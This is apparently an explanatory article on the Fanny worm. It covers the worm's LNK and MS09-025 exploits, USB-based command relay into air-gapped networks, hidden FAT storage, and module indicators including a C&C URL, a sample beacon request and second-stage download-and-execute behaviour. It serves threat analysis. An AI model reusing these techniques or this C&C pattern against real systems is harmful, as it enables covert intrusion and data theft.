Fanny is a computer worm created by the Equation group in 2008 and distributed throughout the Middle East and Asia.

How does fanny computer worm work?

Fanny worm used two zero-day exploits, which were later uncovered during the discovery of Stuxnet. To spread, it used the Stuxnet LNK exploit and USB sticks. For the escalation of privilege, Fanny used a vulnerability patched by the Microsoft bulletin MS09-025, which from 2009 was also used in one of the early versions of Stuxnet.

The main purpose of Fanny appears to have been the mapping of air-gapped networks. For this, it used a unique USB-based command and control mechanism. When a USB stick is infected, Fanny creates a hidden storage area on the stick.

If it infects a computer without an internet connection, it will collect basic system information and save it onto the hidden area of the stick. Later, when a stick containing hidden information is plugged into an internet-connected computer infected by Fanny, the data will be scooped up from the hidden area and sent to the C&C.

If the attackers want to run commands on the air-gapped networks, they can save these commands in the hidden area of the USB stick. When the stick is plugged into the air-gapped computer, Fanny will recognize the commands and execute them. This effectively allowed the Equation group to run commands inside air-gapped networks through the use of infected USB sticks, and also map the infrastructure of such networks.

Several things make Fanny remarkable. First, it used the same LNK exploit as Stuxnet to spread but used it since before Stuxnet. The LNK vulnerability was patched by Microsoft in 2010 after Stuxnet was discovered, but Fanny had used it since 2008. The first known variant of Stuxnet dates from 2009. Fanny also exploited a second vulnerability in Windows that was a zero-day—unpatched flaw—at the time and was later used by some versions of Stuxnet.

Similarities of Fanny worm with Stuxnet

There are also other similarities between the two malware programs, the Kaspersky researchers said. For example, it appears that both the developers of Stuxnet and Fanny follow certain coding guidelines that involve the use of unique numbers, the researchers said.

The fact that two different computer worms used the same zero-day exploits in the same way and at around the same time indicates that their developers are either the same persons or working closely together, the Kaspersky researchers said.

The complexity of Fanny doesn’t stop with its use of zero-days. For example, the malware program creates a hidden storage area on USB drives that are formatted with the FAT16 or FAT32 file system. It does this by using an undocumented combination of file system flags to create a 1MB container that is ignored by the standard FAT drivers used by Windows and other operating systems.

Fanny modules

MD5 0a209ac0de4ac033f31d6ba9191a8f7a
Size 184320
Type Win32 DLL
Internal name dll_installer.dll
Compiled 2008.07.28 08:11:35 (GMT)

This file is a DLL with two exports (to install and uninstall the malware). It contains a xor-encrypted config in binary resource with number 101. The config determines malware behavior: there is a command to deploy malware on the current system, URLs for the C&C server and local filenames and paths used to install embedded malware components.

Fanny computer worm components

Fanny computer worm components

Upon starting it checks the following mutexes:

  • Global\RPCMutex
  • Global\RPCMutex

Where is a 1-byte long integer taken from the config? If any of these mutexes exist, the code doesn’t run. It means that another instance of the same code is running. InstanceNum most likely identifies a variant or generation of Fanny preventing the same version from reinfecting the system but allowing for different versions to run (possibly to enable enforced update of components).

The module also checks another important byte in its configuration. This byte is a counter that is decreased during a successful system infection. When the counter reaches a minimal value of one the module cleans up the USB drive and stops spreading the worm. In this way, the attackers limit the maximum length of the Worm’s kill-chain.

If the module is named “fanny.bmp” (the file name that Fanny uses to spread via USB drives) the module self-installs from the USB drive.

As part of the initial infection process, Fanny attempts to elevate current privileges if the user has no administrative rights on the current system. It uses a vulnerability patched by MS09-025 for that purpose. Only if the elevation succeeds does the malware attempt to connect to the C&C server using a URL which is stored in the config:

  • http://webuysupplystore[.]mooo[.]com/ads/QueryRecord200586_f2ahx.html

Below is a sample request issued by the malware:

GET /ads/QueryRecord200586_f2ahx.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible;)
Host: webuysupplystore.mooo.com

The malware expects the C&C server to reply with an HTTP 200 response and append a 0x7f-xored string that has a second stage URL. The second stage response may contain an executable file body that is saved on disk and executed.

The C&C server is currently sinkhole by Kaspersky Lab, but according to our pDNS records it previously pointed to the following IP address:

  • 210.81.22.239